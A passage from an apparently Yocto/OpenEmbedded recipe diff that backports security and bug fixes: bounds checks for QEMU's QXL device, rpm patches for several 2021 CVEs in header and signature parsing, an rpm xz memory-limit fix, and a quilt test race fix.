75@@ -249,7 +251,20 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
76 qxl_name(qxl_type, ext->cmd.type),
77 compat ? "(compat)" : "");
78
79- data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
80+ switch (ext->cmd.type) {
81+ case QXL_CMD_DRAW:
82+ datasz = compat ? sizeof(QXLCompatDrawable) : sizeof(QXLDrawable);
83+ break;
84+ case QXL_CMD_SURFACE:
85+ datasz = sizeof(QXLSurfaceCmd);
86+ break;
87+ case QXL_CMD_CURSOR:
88+ datasz = sizeof(QXLCursorCmd);
89+ break;
90+ default:
91+ goto out;
92+ }
93+ data = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id, datasz);
94 if (!data) {
95 return 1;
96 }
97@@ -271,6 +286,7 @@ int qxl_log_command(PCIQXLDevice *qxl, const char *ring, QXLCommandExt *ext)
98 qxl_log_cmd_cursor(qxl, data, ext->group_id);
99 break;
100 }
101+out:
102 fprintf(stderr, "\n");
103 return 0;
104 }
105diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
106index d532e157..a65a6d64 100644
107--- a/hw/display/qxl-render.c
108+++ b/hw/display/qxl-render.c
109@@ -107,7 +107,9 @@ static void qxl_render_update_area_unlocked(PCIQXLDevice *qxl)
110 qxl->guest_primary.resized = 0;
111 qxl->guest_primary.data = qxl_phys2virt(qxl,
112 qxl->guest_primary.surface.mem,
113- MEMSLOT_GROUP_GUEST);
114+ MEMSLOT_GROUP_GUEST,
115+ qxl->guest_primary.abs_stride
116+ * height);
117 if (!qxl->guest_primary.data) {
118 return;
119 }
120@@ -222,7 +224,8 @@ static void qxl_unpack_chunks(void *dest, size_t size, PCIQXLDevice *qxl,
121 if (offset == size) {
122 return;
123 }
124- chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id);
125+ chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id,
126+ sizeof(QXLDataChunk) + chunk->data_size);
127 if (!chunk) {
128 return;
129 }
130@@ -289,7 +292,8 @@ fail:
131 /* called from spice server thread context only */
132 int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
133 {
134- QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
135+ QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
136+ sizeof(QXLCursorCmd));
137 QXLCursor *cursor;
138 QEMUCursor *c;
139
140@@ -308,7 +312,15 @@ int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
141 }
142 switch (cmd->type) {
143 case QXL_CURSOR_SET:
144- cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id);
145+ /* First read the QXLCursor to get QXLDataChunk::data_size ... */
146+ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
147+ sizeof(QXLCursor));
148+ if (!cursor) {
149+ return 1;
150+ }
151+ /* Then read including the chunked data following QXLCursor. */
152+ cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
153+ sizeof(QXLCursor) + cursor->chunk.data_size);
154 if (!cursor) {
155 return 1;
156 }
157diff --git a/hw/display/qxl.c b/hw/display/qxl.c
158index 6bc8385b..858d3e93 100644
159--- a/hw/display/qxl.c
160+++ b/hw/display/qxl.c
161@@ -275,7 +275,8 @@ static void qxl_spice_monitors_config_async(PCIQXLDevice *qxl, int replay)
162 QXL_IO_MONITORS_CONFIG_ASYNC));
163 }
164
165- cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST);
166+ cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST,
167+ sizeof(QXLMonitorsConfig));
168 if (cfg != NULL && cfg->count == 1) {
169 qxl->guest_primary.resized = 1;
170 qxl->guest_head0_width = cfg->heads[0].width;
171@@ -460,7 +461,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
172 switch (le32_to_cpu(ext->cmd.type)) {
173 case QXL_CMD_SURFACE:
174 {
175- QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
176+ QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
177+ sizeof(QXLSurfaceCmd));
178
179 if (!cmd) {
180 return 1;
181@@ -494,7 +496,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
182 }
183 case QXL_CMD_CURSOR:
184 {
185- QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
186+ QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
187+ sizeof(QXLCursorCmd));
188
189 if (!cmd) {
190 return 1;
191@@ -674,7 +677,8 @@ static int interface_get_command(QXLInstance *sin, struct QXLCommandExt *ext)
192 *
193 * https://cgit.freedesktop.org/spice/win32/qxl-wddm-dod/commit/?id=f6e099db39e7d0787f294d5fd0dce328b5210faa
194 */
195- void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
196+ void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
197+ sizeof(QXLCommandRing));
198 if (msg != NULL && (
199 msg < (void *)qxl->vga.vram_ptr ||
200 msg > ((void *)qxl->vga.vram_ptr + qxl->vga.vram_size))) {
201@@ -1494,7 +1498,8 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
202 }
203
204 /* can be also called from spice server thread context */
205-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
206+void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id,
207+ size_t size)
208 {
209 uint64_t offset;
210 uint32_t slot;
211@@ -1994,7 +1999,7 @@ static void qxl_dirty_surfaces(PCIQXLDevice *qxl)
212 }
213
214 cmd = qxl_phys2virt(qxl, qxl->guest_surfaces.cmds[i],
215- MEMSLOT_GROUP_GUEST);
216+ MEMSLOT_GROUP_GUEST, sizeof(QXLSurfaceCmd));
217 assert(cmd);
218 assert(cmd->type == QXL_SURFACE_CMD_CREATE);
219 qxl_dirty_one_surface(qxl, cmd->u.surface_create.data,
220diff --git a/hw/display/qxl.h b/hw/display/qxl.h
221index 80eb0d26..fcfd133a 100644
222--- a/hw/display/qxl.h
223+++ b/hw/display/qxl.h
224@@ -147,7 +147,8 @@ typedef struct PCIQXLDevice {
225 #define QXL_DEFAULT_REVISION QXL_REVISION_STABLE_V12
226
227 /* qxl.c */
228-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id);
229+void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id,
230+ size_t size);
231 void qxl_set_guest_bug(PCIQXLDevice *qxl, const char *msg, ...)
232 GCC_FMT_ATTR(2, 3);
233
234--
2352.25.1
236
diff --git a/meta/recipes-devtools/qemu/qemu_4.2.0.bb b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
index 9c76144749..05449afe4e 100644
--- a/meta/recipes-devtools/qemu/qemu_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
@@ -24,7 +24,8 @@ do_install_append_class-nativesdk() {
24} 24}
25 25
26PACKAGECONFIG ??= " \ 26PACKAGECONFIG ??= " \
27 fdt sdl kvm \ 27 fdt sdl kvm slirp \
28 ${@bb.utils.filter('DISTRO_FEATURES', 'alsa xen', d)} \ 28 ${@bb.utils.filter('DISTRO_FEATURES', 'alsa xen', d)} \
29 ${@bb.utils.filter('DISTRO_FEATURES', 'seccomp', d)} \
29" 30"
30PACKAGECONFIG_class-nativesdk ??= "fdt sdl kvm" 31PACKAGECONFIG:class-nativesdk ??= "fdt sdl kvm slirp"
diff --git a/meta/recipes-devtools/quilt/quilt.inc b/meta/recipes-devtools/quilt/quilt.inc
index d7ecda7aaa..ad23b8d922 100644
--- a/meta/recipes-devtools/quilt/quilt.inc
+++ b/meta/recipes-devtools/quilt/quilt.inc
@@ -12,6 +12,7 @@ SRC_URI = "${SAVANNAH_GNU_MIRROR}/quilt/quilt-${PV}.tar.gz \
12 file://Makefile \ 12 file://Makefile \
13 file://test.sh \ 13 file://test.sh \
14 file://0001-tests-Allow-different-output-from-mv.patch \ 14 file://0001-tests-Allow-different-output-from-mv.patch \
15 file://faildiff-order.patch \
15" 16"
16 17
17SRC_URI_append_class-target = " file://gnu_patch_test_fix_target.patch" 18SRC_URI_append_class-target = " file://gnu_patch_test_fix_target.patch"
diff --git a/meta/recipes-devtools/quilt/quilt/faildiff-order.patch b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
new file mode 100644
index 0000000000..f22065a250
--- /dev/null
+++ b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
@@ -0,0 +1,41 @@
1Upstream-Status: Backport
2Signed-off-by: Ross Burton <ross.burton@arm.com>
3
4From 4dfe7f9e702c85243a71e4de267a13e434b6d6c2 Mon Sep 17 00:00:00 2001
5From: Jean Delvare <jdelvare@suse.de>
6Date: Fri, 20 Jan 2023 12:56:08 +0100
7Subject: [PATCH] test: Fix a race condition
8
9The test suite does not differentiate between stdout and stderr. When
10messages are printed to both, the order in which they will reach us
11is apparently not guaranteed. Ideally this would be deterministic, but
12until then, explicitly test stdout and stderr separately in the test
13case itself. Otherwise the test suite fails randomly, which is a pain
14for distribution package maintainers.
15
16This fixes bug #63651 reported by Ross Burton:
17https://savannah.nongnu.org/bugs/index.php?63651
18
19Signed-off-by: Jean Delvare <jdelvare@suse.de>
20---
21 test/faildiff.test | 3 ++-
22 1 file changed, 2 insertions(+), 1 deletion(-)
23
24diff --git a/test/faildiff.test b/test/faildiff.test
25index 5afb8e3..0444c15 100644
26--- a/test/faildiff.test
27+++ b/test/faildiff.test
28@@ -27,8 +27,9 @@ What happens on binary files?
29 > File test.bin added to patch %{P}test.diff
30
31 $ printf "\\003\\000\\001" > test.bin
32- $ quilt diff -pab --no-index
33+ $ quilt diff -pab --no-index 2>/dev/null
34 >~ (Files|Binary files) a/test\.bin and b/test\.bin differ
35+ $ quilt diff -pab --no-index >/dev/null
36 > Diff failed on file 'test.bin', aborting
37 $ echo %{?}
38 > 1
39--
402.34.1
41
diff --git a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
index 6454785254..dc3f74fecd 100644
--- a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
+++ b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
@@ -11,36 +11,39 @@ CPU thread.
11Upstream-Status: Pending [merge of multithreading patches to upstream] 11Upstream-Status: Pending [merge of multithreading patches to upstream]
12 12
13Signed-off-by: Peter Bergin <peter@berginkonsult.se> 13Signed-off-by: Peter Bergin <peter@berginkonsult.se>
14Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
14--- 15---
15 rpmio/rpmio.c | 34 ++++++++++++++++++++++++++++++++++ 16 rpmio/rpmio.c | 36 ++++++++++++++++++++++++++++++++++++
16 1 file changed, 34 insertions(+) 17 1 file changed, 36 insertions(+)
17 18
18diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c 19diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
19index e051c98..b3c56b6 100644 20index e051c98..b3c56b6 100644
20--- a/rpmio/rpmio.c 21--- a/rpmio/rpmio.c
21+++ b/rpmio/rpmio.c 22+++ b/rpmio/rpmio.c
22@@ -845,6 +845,40 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz) 23@@ -845,6 +845,42 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
23 } 24 }
24 #endif 25 #endif
25 26
26+ struct rlimit virtual_memory; 27+ struct rlimit virtual_memory = {RLIM_INFINITY , RLIM_INFINITY};
27+ getrlimit(RLIMIT_AS, &virtual_memory); 28+ int status = getrlimit(RLIMIT_AS, &virtual_memory);
28+ if (virtual_memory.rlim_cur != RLIM_INFINITY) { 29+ if ((status != -1) && (virtual_memory.rlim_cur != RLIM_INFINITY)) {
29+ const uint64_t virtual_memlimit = virtual_memory.rlim_cur; 30+ const uint64_t virtual_memlimit = virtual_memory.rlim_cur;
31+ uint32_t threads_max = lzma_cputhreads();
30+ const uint64_t virtual_memlimit_per_cpu_thread = 32+ const uint64_t virtual_memlimit_per_cpu_thread =
31+ virtual_memlimit / lzma_cputhreads(); 33+ virtual_memlimit / ((threads_max == 0) ? 1 : threads_max);
32+ uint64_t memory_usage_virt;
33+ rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and " 34+ rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and "
34+ "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread); 35+ "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread);
36+ uint64_t memory_usage_virt;
35+ /* keep reducing the number of compression threads until memory 37+ /* keep reducing the number of compression threads until memory
36+ usage falls below the limit per CPU thread*/ 38+ usage falls below the limit per CPU thread*/
37+ while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) > 39+ while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) >
38+ virtual_memlimit_per_cpu_thread) { 40+ virtual_memlimit_per_cpu_thread) {
39+ /* If number of threads goes down to zero lzma_stream_encoder will 41+ /* If number of threads goes down to zero or in case of any other error
40+ * will return UINT64_MAX. We must check here to avoid an infinite loop. 42+ * lzma_stream_encoder_mt_memusage will return UINT64_MAX. We must check
43+ * for both the cases here to avoid an infinite loop.
41+ * If we get into situation that one thread requires more virtual memory 44+ * If we get into situation that one thread requires more virtual memory
42+ * than available we set one thread, print error message and try anyway. */ 45+ * than available we set one thread, print error message and try anyway. */
43+ if (--mt_options.threads == 0) { 46+ if ((--mt_options.threads == 0) || (memory_usage_virt == UINT64_MAX)) {
44+ mt_options.threads = 1; 47+ mt_options.threads = 1;
45+ rpmlog(RPMLOG_WARNING, 48+ rpmlog(RPMLOG_WARNING,
46+ "XZ: Could not adjust number of threads to get below " 49+ "XZ: Could not adjust number of threads to get below "
diff --git a/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
new file mode 100644
index 0000000000..9a5ebb9115
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
@@ -0,0 +1,34 @@
1From 405fc8998181353bd510864ca251dc233afec276 Mon Sep 17 00:00:00 2001
2From: Vitaly Chikunov <vt@altlinux.org>
3Date: Wed, 6 Jan 2021 23:43:41 +0300
4Subject: [PATCH] rpmio: Fix lzopen_internal mode parsing when 'Tn' is used
5
6When there is number after "T" (suggested number of threads or "0" for
7getncpus), lzopen_internal() mode parser would skip one byte, and when
8it's at the end of the string it would then parse undesired garbage from
9the memory, making intermittent compression failures.
10
11Fixes: 7740d1098 ("Add support for multithreaded xz compression")
12Signed-off-by: Vitaly Chikunov <vt@altlinux.org>
13
14Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/405fc8998181353bd510864ca251dc233afec276]
15
16---
17 rpmio/rpmio.c | 1 +
18 1 file changed, 1 insertion(+)
19
20diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
21index ed1e25140..9d32ec6d9 100644
22--- a/rpmio/rpmio.c
23+++ b/rpmio/rpmio.c
24@@ -798,6 +798,7 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
25 * should've processed
26 * */
27 while (isdigit(*++mode));
28+ --mode;
29 }
30 #ifdef HAVE_LZMA_MT
31 else
32--
332.25.1
34
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
new file mode 100644
index 0000000000..f2fc47e321
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
@@ -0,0 +1,109 @@
1From ebbf0f0133c498d229e94ecf2ed0b41d6e6a142a Mon Sep 17 00:00:00 2001
2From: Demi Marie Obenour <athena@invisiblethingslab.com>
3Date: Mon, 8 Feb 2021 16:05:01 -0500
4Subject: [PATCH] hdrblobInit() needs bounds checks too
5
6Users can pass untrusted data to hdrblobInit() and it must be robust
7against this.
8
9Backported from commit 8f4b3c3cab8922a2022b9e47c71f1ecf906077ef
10
11Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/pull/1587/commits/9646711891df851dfbf7ef54cc171574a0914b15]
12CVE: CVE-2021-20266
13Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
14
15---
16 lib/header.c | 48 +++++++++++++++++++++++++++++++-----------------
17 1 file changed, 31 insertions(+), 17 deletions(-)
18
19diff --git a/lib/header.c b/lib/header.c
20index 5b09f8352..ad5b6dc57 100644
21--- a/lib/header.c
22+++ b/lib/header.c
23@@ -11,6 +11,7 @@
24 #include "system.h"
25 #include <netdb.h>
26 #include <errno.h>
27+#include <inttypes.h>
28 #include <rpm/rpmtypes.h>
29 #include <rpm/rpmstring.h>
30 #include "lib/header_internal.h"
31@@ -1890,6 +1891,25 @@ hdrblob hdrblobFree(hdrblob blob)
32 return NULL;
33 }
34
35+static rpmRC hdrblobVerifyLengths(rpmTagVal regionTag, uint32_t il, uint32_t dl,
36+ char **emsg) {
37+ uint32_t il_max = HEADER_TAGS_MAX;
38+ uint32_t dl_max = HEADER_DATA_MAX;
39+ if (regionTag == RPMTAG_HEADERSIGNATURES) {
40+ il_max = 32;
41+ dl_max = 8192;
42+ }
43+ if (hdrchkRange(il_max, il)) {
44+ rasprintf(emsg, _("hdr tags: BAD, no. of tags(%" PRIu32 ") out of range"), il);
45+ return RPMRC_FAIL;
46+ }
47+ if (hdrchkRange(dl_max, dl)) {
48+ rasprintf(emsg, _("hdr data: BAD, no. of bytes(%" PRIu32 ") out of range"), dl);
49+ return RPMRC_FAIL;
50+ }
51+ return RPMRC_OK;
52+}
53+
54 rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrblob blob, char **emsg)
55 {
56 int32_t block[4];
57@@ -1902,13 +1922,6 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
58 size_t nb;
59 rpmRC rc = RPMRC_FAIL; /* assume failure */
60 int xx;
61- int32_t il_max = HEADER_TAGS_MAX;
62- int32_t dl_max = HEADER_DATA_MAX;
63-
64- if (regionTag == RPMTAG_HEADERSIGNATURES) {
65- il_max = 32;
66- dl_max = 8192;
67- }
68
69 memset(block, 0, sizeof(block));
70 if ((xx = Freadall(fd, bs, blen)) != blen) {
71@@ -1921,15 +1934,9 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
72 goto exit;
73 }
74 il = ntohl(block[2]);
75- if (hdrchkRange(il_max, il)) {
76- rasprintf(emsg, _("hdr tags: BAD, no. of tags(%d) out of range"), il);
77- goto exit;
78- }
79 dl = ntohl(block[3]);
80- if (hdrchkRange(dl_max, dl)) {
81- rasprintf(emsg, _("hdr data: BAD, no. of bytes(%d) out of range"), dl);
82+ if (hdrblobVerifyLengths(regionTag, il, dl, emsg))
83 goto exit;
84- }
85
86 nb = (il * sizeof(struct entryInfo_s)) + dl;
87 uc = sizeof(il) + sizeof(dl) + nb;
88@@ -1973,11 +1980,18 @@ rpmRC hdrblobInit(const void *uh, size_t uc,
89 struct hdrblob_s *blob, char **emsg)
90 {
91 rpmRC rc = RPMRC_FAIL;
92-
93 memset(blob, 0, sizeof(*blob));
94+ if (uc && uc < 8) {
95+ rasprintf(emsg, _("hdr length: BAD"));
96+ goto exit;
97+ }
98+
99 blob->ei = (int32_t *) uh; /* discards const */
100- blob->il = ntohl(blob->ei[0]);
101- blob->dl = ntohl(blob->ei[1]);
102+ blob->il = ntohl((uint32_t)(blob->ei[0]));
103+ blob->dl = ntohl((uint32_t)(blob->ei[1]));
104+ if (hdrblobVerifyLengths(regionTag, blob->il, blob->dl, emsg) != RPMRC_OK)
105+ goto exit;
106+
107 blob->pe = (entryInfo) &(blob->ei[2]);
108 blob->pvlen = sizeof(blob->il) + sizeof(blob->dl) +
109 (blob->il * sizeof(*blob->pe)) + blob->dl;
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
new file mode 100644
index 0000000000..b1a05b6863
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
@@ -0,0 +1,197 @@
1From 1e5b70cab83c95aa138107a38ecda75ff70e8985 Mon Sep 17 00:00:00 2001
2From: Minjae Kim <flowergom@gmail.com>
3Date: Thu, 24 Jun 2021 01:11:26 +0000
4Subject: [PATCH] Be much more careful about copying data from the signature
5 header
6
7Only look for known tags, and ensure correct type and size where known
8before copying over. Bump the old arbitrary 16k count limit to 16M limit
9though, it's not inconceivable that a package could have that many files.
10While at it, ensure none of these tags exist in the main header,
11which would confuse us greatly.
12
13This is optimized for backporting ease, upstream can remove redundancies
14and further improve checking later.
15
16Reported and initial patches by Demi Marie Obenour.
17
18Fixes: RhBug:1935049, RhBug:1933867, RhBug:1935035, RhBug:1934125, ...
19
20Fixes: CVE-2021-3421, CVE-2021-20271
21
22Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/d6a86b5e69e46cc283b1e06c92343319beb42e21]
23CVE: CVE-2021-3421
24Signed-off-by: Minjae Kim <flowergom@gmail.com>
25---
26 lib/package.c | 115 ++++++++++++++++++++++++--------------------------
27 lib/rpmtag.h | 4 ++
28 2 files changed, 58 insertions(+), 61 deletions(-)
29
30diff --git a/lib/package.c b/lib/package.c
31index 081123d84e..7c26ea323f 100644
32--- a/lib/package.c
33+++ b/lib/package.c
34@@ -20,76 +20,68 @@
35
36 #include "debug.h"
37
38+struct taglate_s {
39+ rpmTagVal stag;
40+ rpmTagVal xtag;
41+ rpm_count_t count;
42+} const xlateTags[] = {
43+ { RPMSIGTAG_SIZE, RPMTAG_SIGSIZE, 1 },
44+ { RPMSIGTAG_PGP, RPMTAG_SIGPGP, 0 },
45+ { RPMSIGTAG_MD5, RPMTAG_SIGMD5, 16 },
46+ { RPMSIGTAG_GPG, RPMTAG_SIGGPG, 0 },
47+ /* { RPMSIGTAG_PGP5, RPMTAG_SIGPGP5, 0 }, */ /* long obsolete, dont use */
48+ { RPMSIGTAG_PAYLOADSIZE, RPMTAG_ARCHIVESIZE, 1 },
49+ { RPMSIGTAG_FILESIGNATURES, RPMTAG_FILESIGNATURES, 0 },
50+ { RPMSIGTAG_FILESIGNATURELENGTH, RPMTAG_FILESIGNATURELENGTH, 1 },
51+ { RPMSIGTAG_SHA1, RPMTAG_SHA1HEADER, 1 },
52+ { RPMSIGTAG_SHA256, RPMTAG_SHA256HEADER, 1 },
53+ { RPMSIGTAG_DSA, RPMTAG_DSAHEADER, 0 },
54+ { RPMSIGTAG_RSA, RPMTAG_RSAHEADER, 0 },
55+ { RPMSIGTAG_LONGSIZE, RPMTAG_LONGSIGSIZE, 1 },
56+ { RPMSIGTAG_LONGARCHIVESIZE, RPMTAG_LONGARCHIVESIZE, 1 },
57+ { 0 }
58+};
59+
60 /** \ingroup header
61 * Translate and merge legacy signature tags into header.
62 * @param h header (dest)
63 * @param sigh signature header (src)
64 */
65 static
66-void headerMergeLegacySigs(Header h, Header sigh)
67+rpmTagVal headerMergeLegacySigs(Header h, Header sigh, char **msg)
68 {
69- HeaderIterator hi;
70+ const struct taglate_s *xl;
71 struct rpmtd_s td;
72
73- hi = headerInitIterator(sigh);
74- for (; headerNext(hi, &td); rpmtdFreeData(&td))
75- {
76- switch (td.tag) {
77- /* XXX Translate legacy signature tag values. */
78- case RPMSIGTAG_SIZE:
79- td.tag = RPMTAG_SIGSIZE;
80- break;
81- case RPMSIGTAG_PGP:
82- td.tag = RPMTAG_SIGPGP;
83- break;
84- case RPMSIGTAG_MD5:
85- td.tag = RPMTAG_SIGMD5;
86- break;
87- case RPMSIGTAG_GPG:
88- td.tag = RPMTAG_SIGGPG;
89- break;
90- case RPMSIGTAG_PGP5:
91- td.tag = RPMTAG_SIGPGP5;
92- break;
93- case RPMSIGTAG_PAYLOADSIZE:
94- td.tag = RPMTAG_ARCHIVESIZE;
95- break;
96- case RPMSIGTAG_SHA1:
97- case RPMSIGTAG_SHA256:
98- case RPMSIGTAG_DSA:
99- case RPMSIGTAG_RSA:
100- default:
101- if (!(td.tag >= HEADER_SIGBASE && td.tag < HEADER_TAGBASE))
102- continue;
103- break;
104- }
105- if (!headerIsEntry(h, td.tag)) {
106- switch (td.type) {
107- case RPM_NULL_TYPE:
108- continue;
109- break;
110- case RPM_CHAR_TYPE:
111- case RPM_INT8_TYPE:
112- case RPM_INT16_TYPE:
113- case RPM_INT32_TYPE:
114- case RPM_INT64_TYPE:
115- if (td.count != 1)
116- continue;
117- break;
118- case RPM_STRING_TYPE:
119- case RPM_BIN_TYPE:
120- if (td.count >= 16*1024)
121- continue;
122- break;
123- case RPM_STRING_ARRAY_TYPE:
124- case RPM_I18NSTRING_TYPE:
125- continue;
126- break;
127- }
128- (void) headerPut(h, &td, HEADERPUT_DEFAULT);
129- }
130+ rpmtdReset(&td);
131+ for (xl = xlateTags; xl->stag; xl++) {
132+ /* There mustn't be one in the main header */
133+ if (headerIsEntry(h, xl->xtag))
134+ break;
135+ if (headerGet(sigh, xl->stag, &td, HEADERGET_RAW|HEADERGET_MINMEM)) {
136+ /* Translate legacy tags */
137+ if (xl->stag != xl->xtag)
138+ td.tag = xl->xtag;
139+ /* Ensure type and tag size match expectations */
140+ if (td.type != rpmTagGetTagType(td.tag))
141+ break;
142+ if (td.count < 1 || td.count > 16*1024*1024)
143+ break;
144+ if (xl->count && td.count != xl->count)
145+ break;
146+ if (!headerPut(h, &td, HEADERPUT_DEFAULT))
147+ break;
148+ rpmtdFreeData(&td);
149+ }
150+ }
151+ rpmtdFreeData(&td);
152+
153+ if (xl->stag) {
154+ rasprintf(msg, "invalid signature tag %s (%d)",
155+ rpmTagGetName(xl->xtag), xl->xtag);
156 }
157- headerFreeIterator(hi);
158+
159+ return xl->stag;
160 }
161
162 /**
163@@ -337,7 +329,8 @@ rpmRC rpmReadPackageFile(rpmts ts, FD_t fd, const char * fn, Header * hdrp)
164 goto exit;
165
166 /* Append (and remap) signature tags to the metadata. */
167- headerMergeLegacySigs(h, sigh);
168+ if (headerMergeLegacySigs(h, sigh,&msg))
169+ goto exit;
170 applyRetrofits(h);
171
172 /* Bump reference count for return. */
173diff --git a/lib/rpmtag.h b/lib/rpmtag.h
174index 8c718b31b5..d562572c6f 100644
175--- a/lib/rpmtag.h
176+++ b/lib/rpmtag.h
177@@ -65,6 +65,8 @@ typedef enum rpmTag_e {
178 RPMTAG_LONGARCHIVESIZE = RPMTAG_SIG_BASE+15, /* l */
179 /* RPMTAG_SIG_BASE+16 reserved */
180 RPMTAG_SHA256HEADER = RPMTAG_SIG_BASE+17, /* s */
181+ /* RPMTAG_SIG_BASE+18 reserved for RPMSIGTAG_FILESIGNATURES */
182+ /* RPMTAG_SIG_BASE+19 reserved for RPMSIGTAG_FILESIGNATURELENGTH */
183
184 RPMTAG_NAME = 1000, /* s */
185 #define RPMTAG_N RPMTAG_NAME /* s */
186@@ -422,6 +424,8 @@ typedef enum rpmSigTag_e {
187 RPMSIGTAG_LONGSIZE = RPMTAG_LONGSIGSIZE, /*!< internal Header+Payload size (64bit) in bytes. */
188 RPMSIGTAG_LONGARCHIVESIZE = RPMTAG_LONGARCHIVESIZE, /*!< internal uncompressed payload size (64bit) in bytes. */
189 RPMSIGTAG_SHA256 = RPMTAG_SHA256HEADER,
190+ RPMSIGTAG_FILESIGNATURES = RPMTAG_SIG_BASE + 18,
191+ RPMSIGTAG_FILESIGNATURELENGTH = RPMTAG_SIG_BASE + 19,
192 } rpmSigTag;
193
194
195--
1962.17.1
197
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
new file mode 100644
index 0000000000..0882d6f310
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
@@ -0,0 +1,60 @@
1From b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8 Mon Sep 17 00:00:00 2001
2From: Panu Matilainen <pmatilai@redhat.com>
3Date: Thu, 30 Sep 2021 09:51:10 +0300
4Subject: [PATCH] Process MPI's from all kinds of signatures
5
6No immediate effect but needed by the following commits.
7
8Dependent patch:
9CVE: CVE-2021-3521
10Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8]
11Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
12
13---
14 rpmio/rpmpgp.c | 12 +++++-------
15 1 file changed, 5 insertions(+), 7 deletions(-)
16
17diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
18index ee5c81e246..340de5fc9a 100644
19--- a/rpmio/rpmpgp.c
20+++ b/rpmio/rpmpgp.c
21@@ -511,7 +511,7 @@ pgpDigAlg pgpDigAlgFree(pgpDigAlg alg)
22 return NULL;
23 }
24
